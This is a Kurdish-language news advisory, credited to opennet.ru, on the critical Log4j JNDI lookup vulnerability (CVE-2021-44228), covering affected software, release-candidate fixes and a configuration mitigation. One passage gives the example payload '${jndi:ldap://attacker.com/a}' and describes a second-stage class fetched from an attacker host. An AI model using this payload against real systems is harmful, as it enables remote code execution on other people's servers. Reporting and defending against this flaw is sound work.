Di Apache Log4j de, çarçoveyek populer a ji bo birêxistinkirina têketinê di sepanên Java de, qelsiyek krîtîk hate nas kirin ku dihêle ku kodek keyfî were darve kirin dema ku nirxek bi taybetî di forma "{jndi:URL}" de li têketinê were nivîsandin. Êrîş dikare li ser sepanên Java-yê yên ku nirxên ku ji çavkaniyên derveyî têne wergirtin têne tomar kirin, ji bo nimûne, dema ku di peyamên xeletiyê de nirxên pirsgirêk têne xuyang kirin.
Tê destnîşan kirin ku hema hema hemî projeyên ku çarçoveyên wekî Apache Struts, Apache Solr, Apache Druid an Apache Flink bikar tînin ji pirsgirêkê bandor dibin, tevî Steam, Apple iCloud, xerîdar û pêşkêşkerên Minecraft. Tê pêşbînîkirin ku qelsî dikare bibe sedema pêleke êrişên girseyî li ser sepanên pargîdanî, dubarekirina dîroka qelsiyên krîtîk di çarçoveya Apache Struts de, ku, li gorî texmînek hişk, ji hêla 65% ji Fortune ve di sepanên malperê de tê bikar anîn. 100 pargîdanî Di nav de hewildanên lêgerîna torê ji bo pergalên xedar.
Pirsgirêk ji ber vê yekê girantir dibe ku karûbarek xebitandinê jixwe hatî weşandin, lê rastkirinên ji bo şaxên stabîl hêj nehatine berhev kirin. Nasnameya CVE hîn nehatiye destnîşankirin. Rastkirin tenê di şaxê testê log4j-2.15.0-rc1 de tê de heye. Ji bo astengkirina qelsiyê, wekî çareyek ji bo astengkirinê, tê pêşniyar kirin ku pîvana log4j2.formatMsgNoLookups wekî rast were danîn.
Pirsgirêk ji ber vê yekê bû ku log4j di xetên ku ji têketinê derdixin de piştgirîkirina masûlkeyên taybetî yên "{}" piştgirî dike, ku tê de pirsnameyên JNDI (Navê Java û Navbera Navberê) dikare were darve kirin. Êrîş bi derbaskirina rêzek bi cîgirkirina "${jndi:ldap://attacker.com/a}" re derbas dibe, piştî ku log4j hildiweşîne dê daxwazek LDAP-ê ji bo riya çîna Java ji servera êrîşkar.com re bişîne. . Rêya ku ji hêla servera êrîşkar ve hatî vegerandin (mînak, http://second-stage.attacker.com/Exploit.class) dê di çarçoweya pêvajoya heyî de were barkirin û darvekirin, ku destûrê dide êrîşkar koda kêfî li ser sîstema bi mafên sepana niha.
Zêdebûn 1: Zelalbûnê bi nasnavê CVE-2021-44228 ve hatî destnîşan kirin.
Pêvek 2: Rêyek ji bo derbaskirina parastina ku ji hêla serbestberdana log4j-2.15.0-rc1 ve hatî zêdekirin hate nas kirin. Nûvekirinek nû, log4j-2.15.0-rc2, bi parastina bêkêmasî ya li hember qelsbûnê hatî pêşniyar kirin. Kod guheztina ku bi nebûna bidawîbûnek nenormal ve girêdayî ye di mijara karanîna URL-ya JNDI ya ku bi xelet formatkirî ve girêdayî ye ronî dike.
Source: opennet.ru